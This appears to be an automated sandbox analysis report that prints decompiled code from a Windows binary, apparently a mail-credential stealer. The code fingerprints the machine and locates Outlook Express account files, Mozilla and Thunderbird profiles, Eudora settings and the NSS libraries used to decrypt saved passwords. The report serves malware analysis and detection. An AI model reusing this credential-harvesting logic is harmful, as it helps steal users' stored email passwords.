40cdfd memcpy 7059->7060 7060->7058 7062 40ded8 FreeLibrary 7061->7062 7063 40dedb 7061->7063 7062->7063 7064 40dee2 7063->7064 7065 40dedf FreeLibrary 7063->7065 7066 40dee6 FreeLibrary 7064->7066 7067 40dee9 LoadLibraryExA 7064->7067 7065->7064 7066->7067 7067->7024 7067->7029 7095 40eb3f RegOpenKeyExA 7068->7095 7070 40f48b 7071 40f5e6 strcpy 7070->7071 7072 40f496 memset 7070->7072 7074 40f5f9 ExpandEnvironmentStringsA 7071->7074 7093 40f639 7071->7093 7096 40ec05 RegEnumKeyExA 7072->7096 7076 40f3ba 8 API calls 7074->7076 7075 40f4c1 7077 40f4c9 _mbsnbicmp 7075->7077 7078 40f5dd RegCloseKey 7075->7078 7090 40f57b _mbsicmp 7075->7090 7097 40f3ba memset strlen strlen 7075->7097 7103 40ec05 RegEnumKeyExA 7075->7103 7079 40f60c 7076->7079 7077->7075 7080 40f4e7 memset memset _snprintf 7077->7080 7078->7071 7079->7093 7104 406172 7079->7104 7082 40ebc1 3 API calls 7080->7082 7084 40f54c _mbsrchr 7082->7084 7084->7075 7086 40f3ba 8 API calls 7087 40f621 7086->7087 7089 40f62b GetCurrentDirectoryA 7087->7089 7087->7093 7091 40f3ba 8 API calls 7089->7091 7090->7075 7092 40f594 strcpy strcpy 7090->7092 7091->7093 7092->7075 7093->7039 7094->7048 7095->7070 7096->7075 7098 40f401 7097->7098 7099 40f410 7097->7099 7100 4062ad strlen strcat strcpy strcat 7098->7100 7101 40614b GetFileAttributesA 7099->7101 7100->7099 7102 40f427 7101->7102 7102->7075 7103->7075 7105 406160 GetModuleFileNameA 7104->7105 7106 406178 strlen 7105->7106 7107 406182 7106->7107 7107->7086 7110 4089d7 ??3@YAXPAX 7108->7110 7112 408964 7108->7112 7110->6109 7112->7110 7113 404d92 SendMessageA 7112->7113 7114 404dc0 7113->7114 7114->7112 7115->5861 7116->5867 7118 4090fa 7117->7118 7122 4090b6 7117->7122 7138 405efd strlen WriteFile 7118->7138 7120 409108 7120->5868 7121 405efd strlen WriteFile 7121->7122 7122->7118 7122->7121 7127 4091e0 7123->7127 7129 4092df 7123->7129 7125 4092ed 7125->5874 7126 40920a strchr 7126->7127 7128 409218 strchr 7126->7128 7127->7126 7127->7129 7130 406bdf 7 API calls 7127->7130 7131 405efd strlen WriteFile 7127->7131 7132 406b5b free 7127->7132 7128->7127 7139 405efd strlen WriteFile 7129->7139 7130->7127 7131->7127 7132->7127 7134 405f51 GetLastError 7133->7134 7135 405f59 7133->7135 7134->7135 7140 405e46 7135->7140 7138->7120 7139->7125 7141 405e63 LoadLibraryExA 7140->7141 7142 405e7a FormatMessageA 7140->7142 7141->7142 7143 405e75 7141->7143 7144 405e93 strlen 7142->7144 7145 405eb8 strcpy 7142->7145 7143->7142 7147 405ea0 strcpy 7144->7147 7148 405ead LocalFree 7144->7148 7146 405ec7 sprintf MessageBoxA 7145->7146 7146->5871 7147->7148 7148->7146 7150 4047f1 FreeLibrary 7149->7150 7151 40420c 7150->7151 7152 40e8ab FreeLibrary 7151->7152 7153 40421d 7152->7153 7154 4047f1 FreeLibrary 7153->7154 7155 404238 7154->7155 7160 404172 7155->7160 7159 404244 ??3@YAXPAX 7159->5890 7161 40462e free 7160->7161 7162 40417e 7161->7162 7163 404192 7162->7163 7164 404184 SetCurrentDirectoryA 7162->7164 7165 406b5b free 7163->7165 7164->7163 7166 4041a5 7165->7166 7167 406b5b free 7166->7167 7168 4041ad 7167->7168 7169 4085d8 7168->7169 7170 408572 5 API calls 7169->7170 7171 4085e6 7170->7171 7172 4085f9 7171->7172 7173 406b5b free 7171->7173 7174 40860c 7172->7174 7176 406b5b free 7172->7176 7175 4085f2 ??3@YAXPAX 7173->7175 7177 40861f 7174->7177 7179 406b5b free 7174->7179 7175->7172 7178 408605 ??3@YAXPAX 7176->7178 7180 406b5b free 7177->7180 7181 408632 free 7177->7181 7178->7174 7182 408618 ??3@YAXPAX 7179->7182 7183 40862b ??3@YAXPAX 7180->7183 7181->7159 7182->7177 7183->7181 7199 40ec5f 7202 40ea72 7199->7202 7203 40ea7f 7202->7203 7204 40eac6 memset GetPrivateProfileStringA 7203->7204 7205 40ea8d memset 7203->7205 7210 4067dc strlen 7204->7210 7215 406763 7205->7215 7209 40eb08 7211 4067f0 7210->7211 7212 4067f2 7210->7212 7211->7209 7213 406839 7212->7213 7219 406512 strtoul 7212->7219 7213->7209 7216 406774 7215->7216 7217 4067cc WritePrivateProfileStringA 7215->7217 7216->7217 7218 40677b sprintf memcpy 7216->7218 7217->7209 7218->7216 7218->7217 7219->7212 7231 405a64 7232 405a7b 7231->7232 7257 405bbe 7231->7257 7233 405a8f 7232->7233 7235 401e8b 40 API calls 7232->7235 7237 405ac2 7233->7237 7258 4078ff 7233->7258 7235->7233 7240 4078ff 12 API calls 7237->7240 7251 405afd 7237->7251 7237->7257 7238 405b53 memset 7241 4078ff 12 API calls 7238->7241 7245 405aee 7240->7245 7246 405b7a 7241->7246 7244 4078ff 12 API calls 7247 405b29 7244->7247 7248 40efae 4 API calls 7245->7248 7276 40684d memset 7246->7276 7250 40efae 4 API calls 7247->7250 7248->7251 7253 405b38 7250->7253 7251->7244 7251->7253 7251->7257 7253->7238 7253->7257 7254 4078ff 12 API calls 7255 405ba8 7254->7255 7280 406618 GetOpenFileNameA 7255->7280 7283 4015ef 7257->7283 7259 407908 7258->7259 7261 40790d 7258->7261 7287 40787d 7259->7287 7262 407970 strcpy 7261->7262 7265 40793d 7261->7265 7269 405ab3 7261->7269 7290 407d89 _itoa 7262->7290 7263 4079c8 LoadStringA 7267 4079d2 7263->7267 7265->7263 7267->7269 7270 4079f3 memcpy 7267->7270 7268 407992 strlen 7268->7265 7268->7267 7271 40efae SHGetMalloc 7269->7271 7270->7269 7272 40f01e 7271->7272 7273 40efc8 SHBrowseForFolderA 7271->7273 7272->7237 7273->7272 7274 40effc SHGetPathFromIDListA 7273->7274 7274->7272 7275 40f00e strcpy 7274->7275 7275->7272 7277 405b95 7276->7277 7278 40687f 7276->7278 7277->7254 7279 406889 sprintf strlen memcpy strlen memcpy 7278->7279 7279->7277 7279->7279 7281 40667c 7280->7281 7282 40666c strcpy 7280->7282 7281->7257 7282->7257 7284 401623 7283->7284 7285 4015fc 7283->7285 7285->7284 7286 401613 EndDialog 7285->7286 7286->7284 7288 407886 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 7287->7288 7289 4078fe 7287->7289 7288->7289 7289->7261 7293 407de5 7290->7293 7292 40798b 7292->7265 7292->7268 7294 4118a0 7293->7294 7295 407df2 memset GetPrivateProfileStringA 7294->7295 7296 407e51 7295->7296 7297 407e3b strcpy 7295->7297 7296->7292 7297->7292 5524 411570 5527 41154a 5524->5527 5526 411579 5528 411553 _onexit 5527->5528 5529 411559 __dllonexit 5527->5529 5528->5529 5529->5526 7756 411904 7759 411570 7756->7759 7760 41154a 2 API calls 7759->7760 7761 411579 7760->7761 7194 40ed0b FindResourceA 7195 40ed24 SizeofResource 7194->7195 7196 40ed4e 7194->7196 7195->7196 7197 40ed35 LoadResource 7195->7197 7197->7196 7198 40ed43 LockResource 7197->7198 7198->7196 5530 40ed91 EnumResourceNamesA 5531 411932 5532 411942 5531->5532 5533 41193b ??3@YAXPAX 5531->5533 5534 411952 5532->5534 5535 41194b ??3@YAXPAX 5532->5535 5533->5532 5536 411962 5534->5536 5537 41195b ??3@YAXPAX 5534->5537 5535->5534 5538 411972 5536->5538 5539 41196b ??3@YAXPAX 5536->5539 5537->5536 5539->5538 7185 40ec35 7188 40eb0e 7185->7188 7187 40ec55 7189 40eb1a 7188->7189 7190 40eb2c GetPrivateProfileIntA 7188->7190 7193 40ea26 memset _itoa WritePrivateProfileStringA 7189->7193 7190->7187 7192 40eb27 7192->7187 7193->7192 8827 4106be strcmp 8828 410710 strcmp 8827->8828 8829 4106e0 8827->8829 8830 410727 8828->8830 8831 41073f strcmp 8828->8831 8834 4060d0 2 API calls 8829->8834 8839 4060d0 2 API calls 8830->8839 8832 410750 8831->8832 8833 410768 strcmp 8831->8833 8844 4060d0 2 API calls 8832->8844 8835 410791 strcmp 8833->8835 8836 410779 8833->8836 8840 4106fa 8834->8840 8837 4107a2 8835->8837 8838 4107ba strcmp 8835->8838 8845 4060d0 2 API calls 8836->8845 8852 4060d0 2 API calls 8837->8852 8842 4107cb 8838->8842 8843 4107ed strcmp 8838->8843 8841 41073e 8839->8841 8853 4060d0 2 API calls 8840->8853 8841->8831 8857 4060d0 2 API calls 8842->8857 8847 410820 strcmp 8843->8847 8848 4107fe 8843->8848 8846 410767 8844->8846 8849 410790 8845->8849 8846->8833 8850 410831 8847->8850 8851 410853 strcmp 8847->8851 8861 4060d0 2 API calls 8848->8861 8849->8835 8866 4060d0 2 API calls 8850->8866 8855 410864 8851->8855 8856 410886 strcmp 8851->8856 8854 4107b9 8852->8854 8858 41070f 8853->8858 8854->8838 8870 4060d0 2 API calls 8855->8870 8859 410897 8856->8859 8860 4108af strcmp 8856->8860 8862 4107e2 8857->8862 8858->8828 8907 410525 8859->8907 8864 4108c0 8860->8864 8865 4108d8 strcmp 8860->8865 8863 410815 8861->8863 8862->8843 8863->8847 8877 410525 16 API calls 8864->8877 8868 410901 strcmp 8865->8868 8869 4108e9 8865->8869 8867 410848 8866->8867 8867->8851 8871 410912 8868->8871 8872 41092a strcmp 8868->8872 8880 410525 16 API calls 8869->8880 8874 41087b 8870->8874 8881 410525 16 API calls 8871->8881 8875 410953 strcmp 8872->8875 8876 41093b 8872->8876 8874->8856 8878 410994 _stricmp 8875->8878 8879 410964 8875->8879 8884 4060d0 2 API calls 8876->8884 8877->8865 8882 4109c3 _stricmp 8878->8882 8883 4109ab 8878->8883 8889 4060d0 2 API calls 8879->8889 8880->8868 8881->8872 8885 4109d4 _stricmp 8882->8885 8886 4109f6 8882->8886 8929 406512 strtoul 8883->8929 8887 410952 8884->8887 8885->8886 8888 4109e5 _stricmp 8885->8888 8930 406512 strtoul 8886->8930 8887->8875 8888->8886 8891 410a0e _stricmp 8888->8891 8892 41097e 8889->8892 8894 410a37 _stricmp 8891->8894 8895 410a1f 8891->8895 8899 4060d0 2 API calls 8892->8899 8898 410a48 _stricmp 8894->8898 8904 410a6a 8894->8904 8931 406512 strtoul 8895->8931 8896 4109bc 8896->8882 8897 410a07 8897->8891 8900 410a59 _stricmp 8898->8900 8898->8904 8901 410993 8899->8901 8903 410a7b 8900->8903 8900->8904 8901->8878 8932 406512 strtoul 8904->8932 8905 410a30 8905->8894 8933 4046d7 strcpy 8907->8933 8909 41053d 8910 4047a0 3 API calls 8909->8910 8911 410542 8910->8911 8912 41054a strlen ??2@YAPAXI 8911->8912 8913 4106ad 8911->8913 8914 410592 memset memset 8912->8914 8915 41056c 8912->8915 8916 4047f1 FreeLibrary 8913->8916 8919 4105db 8914->8919 8915->8914 8934 406512 strtoul 8915->8934 8917 4106b8 8916->8917 8917->8860 8920 4105ec strcpy 8919->8920 8921 4105fa 8919->8921 8920->8921 8935 40eb3f RegOpenKeyExA 8921->8935 8923 41060f 8925 41063d 8923->8925 8936 40eba3 RegQueryValueExA 8923->8936 8927 410670 WideCharToMultiByte LocalFree 8925->8927 8928 4106a3 ??3@YAXPAX 8925->8928 8926 410631 RegCloseKey 8926->8925 8927->8928 8928->8913 8929->8896 8930->8897 8931->8905 8932->8903 8933->8909 8934->8915 8935->8923 8936->8926

                                                              Executed Functions

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 40724c-407395 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 407397 129->130 131 4073cb-4073ce 129->131 132 40739d-4073a6 130->132 133 4073d0-4073d9 131->133 134 4073ff-407403 131->134 135 4073a8-4073ac 132->135 136 4073ad-4073c9 132->136 137 4073e0-4073fd 133->137 138 4073db-4073df 133->138 135->136 136->131 136->132 137->133 137->134 138->137
                                                              C-Code - Quality: 100%
                                                              			E0040724C(signed int _a4) {
                                                              				char _v5;
                                                              				char _v6;
                                                              				char _v7;
                                                              				char _v8;
                                                              				char _v9;
                                                              				char _v10;
                                                              				char _v11;
                                                              				char _v12;
                                                              				char _v13;
                                                              				char _v14;
                                                              				char _v15;
                                                              				char _v16;
                                                              				char _v17;
                                                              				char _v18;
                                                              				char _v19;
                                                              				void _v20;
                                                              				long _v24;
                                                              				int _v28;
                                                              				int _v32;
                                                              				void* _v36;
                                                              				void _v291;
                                                              				char _v292;
                                                              				void _v547;
                                                              				char _v548;
                                                              				void _v1058;
                                                              				short _v1060;
                                                              				void _v1570;
                                                              				short _v1572;
                                                              				int _t88;
                                                              				signed int _t91;
                                                              				signed int _t92;
                                                              				signed int _t94;
                                                              				signed int _t96;
                                                              				signed int _t99;
                                                              				signed int _t104;
                                                              				signed short* _t110;
                                                              				void* _t113;
                                                              				void* _t114;
                                                              
                                                              				_t92 = 0;
                                                              				_v20 = 0xa3;
                                                              				_v19 = 0x1e;
                                                              				_v18 = 0xf3;
                                                              				_v17 = 0x69;
                                                              				_v16 = 7;
                                                              				_v15 = 0x62;
                                                              				_v14 = 0xd9;
                                                              				_v13 = 0x1f;
                                                              				_v12 = 0x1e;
                                                              				_v11 = 0xe9;
                                                              				_v10 = 0x35;
                                                              				_v9 = 0x7d;
                                                              				_v8 = 0x4f;
                                                              				_v7 = 0xd2;
                                                              				_v6 = 0x7d;
                                                              				_v5 = 0x48;
                                                              				_v292 = 0;
                                                              				memset( &_v291, 0, 0xff);
                                                              				_v548 = 0;
                                                              				memset( &_v547, 0, 0xff);
                                                              				_v1572 = 0;
                                                              				memset( &_v1570, 0, 0x1fe);
                                                              				_v1060 = 0;
                                                              				memset( &_v1058, 0, 0x1fe);
                                                              				_v36 = _a4 + 4;
                                                              				_a4 = 0;
                                                              				_v24 = 0xff;
                                                              				GetComputerNameA( &_v292,  &_v24); // executed
                                                              				_v24 = 0xff;
                                                              				GetUserNameA( &_v548,  &_v24); // executed
                                                              				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                              				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                              				_v32 = strlen( &_v292);
                                                              				_t88 = strlen( &_v548);
                                                              				_t113 = _v36;
                                                              				_v28 = _t88;
                                                              				memcpy(_t113,  &_v20, 0x10);
                                                              				_t91 = 0xba0da71d;
                                                              				if(_v28 > 0) {
                                                              					_t110 =  &_v1060;
                                                              					do {
                                                              						_t104 = _a4 & 0x80000003;
                                                              						if(_t104 < 0) {
                                                              							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                              						}
                                                              						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                              						_t91 = _t91 * 0xbc8f;
                                                              						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                              						_a4 = _a4 + 1;
                                                              						_t110 =  &(_t110[1]);
                                                              					} while (_a4 < _v28);
                                                              				}
                                                              				if(_v32 > _t92) {
                                                              					do {
                                                              						_t99 = _a4 & 0x80000003;
                                                              						if(_t99 < 0) {
                                                              							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                              						}
                                                              						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                              						_t91 = _t91 * 0xbc8f;
                                                              						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                              						_a4 = _a4 + 1;
                                                              						_t92 = _t92 + 1;
                                                              					} while (_t92 < _v32);
                                                              				}
                                                              				return _t91;
                                                              			}









































                                                              0x0040725d
                                                              0x00407268
                                                              0x0040726c
                                                              0x00407270
                                                              0x00407274
                                                              0x00407278
                                                              0x0040727c
                                                              0x00407280
                                                              0x00407284
                                                              0x00407288
                                                              0x0040728c
                                                              0x00407290
                                                              0x00407294
                                                              0x00407298
                                                              0x0040729c
                                                              0x004072a0
                                                              0x004072a4
                                                              0x004072a8
                                                              0x004072ae
                                                              0x004072bc
                                                              0x004072c2
                                                              0x004072d5
                                                              0x004072dc
                                                              0x004072ea
                                                              0x004072f1
                                                              0x004072fc
                                                              0x0040730d
                                                              0x00407310
                                                              0x00407313
                                                              0x00407324
                                                              0x00407327
                                                              0x00407346
                                                              0x0040735b
                                                              0x00407369
                                                              0x00407373
                                                              0x00407378
                                                              0x0040737b
                                                              0x00407385
                                                              0x00407390
                                                              0x00407395
                                                              0x00407397
                                                              0x0040739d
                                                              0x004073a0
                                                              0x004073a6
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073b0
                                                              0x004073b3
                                                              0x004073bc
                                                              0x004073be
                                                              0x004073c5
                                                              0x004073c6
                                                              0x0040739d
                                                              0x004073ce
                                                              0x004073d0
                                                              0x004073d3
                                                              0x004073d9
                                                              0x004073df
                                                              0x004073df
                                                              0x004073e8
                                                              0x004073eb
                                                              0x004073f4
                                                              0x004073f6
                                                              0x004073f9
                                                              0x004073fa
                                                              0x004073d0
                                                              0x00407403

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                              • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                              • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                              • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 406ec3-406ecc 389 406ece-406eed FindFirstFileA 388->389 390 406eef-406f03 FindNextFileA 388->390 391 406f0a-406f0f 389->391 392 406f11-406f3f strlen * 2 390->392 393 406f05 call 406f5b 390->393 391->392 395 406f54-406f5a 391->395 396 406f41-406f4c call 4062ad 392->396 397 406f4e 392->397 393->391 399 406f51-406f53 396->399 397->399 399->395
                                                              C-Code - Quality: 100%
                                                              			E00406EC3(void** __eax) {
                                                              				void* __esi;
                                                              				void* _t15;
                                                              				int _t16;
                                                              				int _t17;
                                                              				void* _t26;
                                                              				void** _t38;
                                                              				void** _t40;
                                                              				void* _t45;
                                                              
                                                              				_t40 = __eax;
                                                              				_t15 =  *__eax;
                                                              				if(_t15 != 0xffffffff) {
                                                              					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
                                                              					 *(_t45 + 4) = _t16;
                                                              					if(_t16 != 0) {
                                                              						goto L5;
                                                              					} else {
                                                              						E00406F5B(_t40);
                                                              						goto L4;
                                                              					}
                                                              				} else {
                                                              					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
                                                              					 *_t40 = _t26;
                                                              					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                                              					L4:
                                                              					if( *(_t45 + 4) != 0) {
                                                              						L5:
                                                              						_t38 =  &(_t40[0xa2]);
                                                              						_t28 =  &(_t40[0x5d]);
                                                              						_t41 =  &(_t40[0xf3]);
                                                              						_t17 = strlen( &(_t40[0xf3]));
                                                              						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
                                                              							 *_t38 = 0;
                                                              						} else {
                                                              							E004062AD(_t38, _t41, _t28);
                                                              						}
                                                              					}
                                                              				}
                                                              				return  *(_t45 + 4);
                                                              			}











                                                              0x00406ec5
                                                              0x00406ec7
                                                              0x00406ecc
                                                              0x00406ef7
                                                              0x00406eff
                                                              0x00406f03
                                                              0x00000000
                                                              0x00406f05
                                                              0x00406f05
                                                              0x00000000
                                                              0x00406f05
                                                              0x00406ece
                                                              0x00406ed9
                                                              0x00406ee7
                                                              0x00406ee9
                                                              0x00406f0a
                                                              0x00406f0f
                                                              0x00406f11
                                                              0x00406f14
                                                              0x00406f1a
                                                              0x00406f20
                                                              0x00406f27
                                                              0x00406f3f
                                                              0x00406f4e
                                                              0x00406f41
                                                              0x00406f45
                                                              0x00406f4b
                                                              0x00406f53
                                                              0x00406f0f
                                                              0x00406f5a

                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                              • strlen.MSVCRT ref: 00406F27
                                                              • strlen.MSVCRT ref: 00406F2F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: rA
                                                              • API String ID: 379999529-474049127
                                                              • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                              • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                              • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                              • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              C-Code - Quality: 97%
                                                              			E00401E8B(void* __eflags, char* _a4) {
                                                              				signed int _v8;
                                                              				int _v12;
                                                              				void _v275;
                                                              				char _v276;
                                                              				void _v539;
                                                              				char _v540;
                                                              				void _v795;
                                                              				char _v796;
                                                              				void _v1059;
                                                              				char _v1060;
                                                              				void _v1323;
                                                              				char _v1324;
                                                              				void _v2347;
                                                              				char _v2348;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				int _t65;
                                                              				char* _t69;
                                                              				char _t70;
                                                              				int _t71;
                                                              				char _t75;
                                                              				void* _t76;
                                                              				long _t78;
                                                              				void* _t83;
                                                              				int _t85;
                                                              				void* _t87;
                                                              				int _t104;
                                                              				int _t108;
                                                              				char _t126;
                                                              				void* _t137;
                                                              				void* _t139;
                                                              				char* _t157;
                                                              				char* _t158;
                                                              				char* _t160;
                                                              				int _t161;
                                                              				void* _t164;
                                                              				CHAR* _t169;
                                                              				char* _t170;
                                                              				void* _t171;
                                                              				void* _t172;
                                                              				void* _t173;
                                                              				void* _t174;
                                                              				void* _t175;
                                                              
                                                              				_v540 = 0;
                                                              				memset( &_v539, 0, 0x104);
                                                              				_t164 = 0x1a;
                                                              				E0040EE59( &_v540, _t164); // executed
                                                              				_t65 = strlen("Mozilla\\Profiles");
                                                              				_t6 = strlen( &_v540) + 1; // 0x1
                                                              				_t172 = _t171 + 0x14;
                                                              				if(_t65 + _t6 >= 0x104) {
                                                              					_t69 = _a4;
                                                              					 *_t69 = 0;
                                                              					_t157 = _t69;
                                                              				} else {
                                                              					_t157 = _a4;
                                                              					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
                                                              				}
                                                              				_t70 = E0040614B(_t157);
                                                              				if(_t70 == 0) {
                                                              					 *_t157 = _t70;
                                                              				}
                                                              				_t158 = _t157 + 0x105;
                                                              				_t71 = strlen("Thunderbird\\Profiles");
                                                              				_t12 = strlen( &_v540) + 1; // 0x1
                                                              				if(_t71 + _t12 >= 0x104) {
                                                              					 *_t158 = 0;
                                                              				} else {
                                                              					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
                                                              				}
                                                              				_t75 = E0040614B(_t158);
                                                              				_pop(_t137);
                                                              				if(_t75 == 0) {
                                                              					 *_t158 = _t75;
                                                              				}
                                                              				_t160 = _a4 + 0x20a;
                                                              				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                              				_t173 = _t172 + 0xc;
                                                              				if(_t76 == 0) {
                                                              					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
                                                              					_t173 = _t173 + 0xc;
                                                              					if(_t126 == 0) {
                                                              						 *_t160 = _t126;
                                                              					}
                                                              				}
                                                              				_v8 = _v8 & 0x00000000;
                                                              				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                              				_t174 = _t173 + 0xc;
                                                              				if(_t78 != 0) {
                                                              					L32:
                                                              					_t169 = _a4 + 0x30f;
                                                              					if( *_t169 != 0) {
                                                              						L35:
                                                              						return _t78;
                                                              					}
                                                              					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                              					_t78 = E0040614B(_t169);
                                                              					if(_t78 != 0) {
                                                              						goto L35;
                                                              					}
                                                              					 *_t169 = _t78;
                                                              					return _t78;
                                                              				} else {
                                                              					_v796 = _t78;
                                                              					_t161 = 0;
                                                              					memset( &_v795, 0, 0xff);
                                                              					_v12 = 0;
                                                              					_t83 = E0040EC05(_v8, 0,  &_v796);
                                                              					_t175 = _t174 + 0x18;
                                                              					if(_t83 != 0) {
                                                              						L31:
                                                              						_t78 = RegCloseKey(_v8);
                                                              						goto L32;
                                                              					}
                                                              					_t170 = "sqlite3.dll";
                                                              					do {
                                                              						_t85 = atoi( &_v796);
                                                              						_pop(_t139);
                                                              						if(_t85 < 3) {
                                                              							goto L28;
                                                              						}
                                                              						_v2348 = 0;
                                                              						memset( &_v2347, _t161, 0x3ff);
                                                              						_v276 = 0;
                                                              						memset( &_v275, _t161, 0x104);
                                                              						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                              						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                              						_t175 = _t175 + 0x38;
                                                              						if(_v276 != 0 && E0040614B( &_v276) != 0) {
                                                              							_v1060 = 0;
                                                              							memset( &_v1059, _t161, 0x104);
                                                              							_v1324 = 0;
                                                              							memset( &_v1323, _t161, 0x104);
                                                              							_t104 = strlen(_t170);
                                                              							_t41 = strlen( &_v276) + 1; // 0x1
                                                              							_t175 = _t175 + 0x20;
                                                              							if(_t104 + _t41 >= 0x104) {
                                                              								_v1060 = 0;
                                                              							} else {
                                                              								E004062AD( &_v1060,  &_v276, _t170);
                                                              							}
                                                              							_t108 = strlen("nss3.dll");
                                                              							_t47 = strlen( &_v276) + 1; // 0x1
                                                              							if(_t108 + _t47 >= 0x104) {
                                                              								_v1324 = 0;
                                                              							} else {
                                                              								E004062AD( &_v1324,  &_v276, "nss3.dll");
                                                              							}
                                                              							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
                                                              								_t161 = 0;
                                                              								goto L28;
                                                              							} else {
                                                              								strcpy(_a4 + 0x30f,  &_v276);
                                                              								goto L31;
                                                              							}
                                                              						}
                                                              						L28:
                                                              						_v12 = _v12 + 1;
                                                              						_t87 = E0040EC05(_v8, _v12,  &_v796);
                                                              						_t175 = _t175 + 0xc;
                                                              					} while (_t87 == 0);
                                                              					goto L31;
                                                              				}
                                                              			}














































                                                              0x00401ea6
                                                              0x00401ead
                                                              0x00401eb4
                                                              0x00401ebb
                                                              0x00401ec6
                                                              0x00401ed9
                                                              0x00401edd
                                                              0x00401ee2
                                                              0x00401efa
                                                              0x00401efd
                                                              0x00401f00
                                                              0x00401ee4
                                                              0x00401ee4
                                                              0x00401ef1
                                                              0x00401ef7
                                                              0x00401f03
                                                              0x00401f0b
                                                              0x00401f0d
                                                              0x00401f0d
                                                              0x00401f14
                                                              0x00401f1a
                                                              0x00401f2d
                                                              0x00401f35
                                                              0x00401f4e
                                                              0x00401f37
                                                              0x00401f45
                                                              0x00401f4b
                                                              0x00401f52
                                                              0x00401f59
                                                              0x00401f5a
                                                              0x00401f5c
                                                              0x00401f5c
                                                              0x00401f6b
                                                              0x00401f76
                                                              0x00401f7b
                                                              0x00401f85
                                                              0x00401f92
                                                              0x00401f97
                                                              0x00401f9c
                                                              0x00401f9e
                                                              0x00401f9e
                                                              0x00401f9c
                                                              0x00401fa0
                                                              0x00401fae
                                                              0x00401fb3
                                                              0x00401fb8
                                                              0x004021a9
                                                              0x004021ac
                                                              0x004021b5
                                                              0x004021d5
                                                              0x004021d5
                                                              0x004021d5
                                                              0x004021be
                                                              0x004021c5
                                                              0x004021cd
                                                              0x00000000
                                                              0x00000000
                                                              0x004021cf
                                                              0x00000000
                                                              0x00401fbe
                                                              0x00401fc3
                                                              0x00401fc9
                                                              0x00401fd3
                                                              0x00401fe3
                                                              0x00401fe6
                                                              0x00401feb
                                                              0x00401ff0
                                                              0x004021a0
                                                              0x004021a3
                                                              0x00000000
                                                              0x004021a3
                                                              0x00401ff6
                                                              0x00401ffb
                                                              0x00402002
                                                              0x0040200a
                                                              0x0040200b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040201e
                                                              0x00402025
                                                              0x00402033
                                                              0x0040203a
                                                              0x00402052
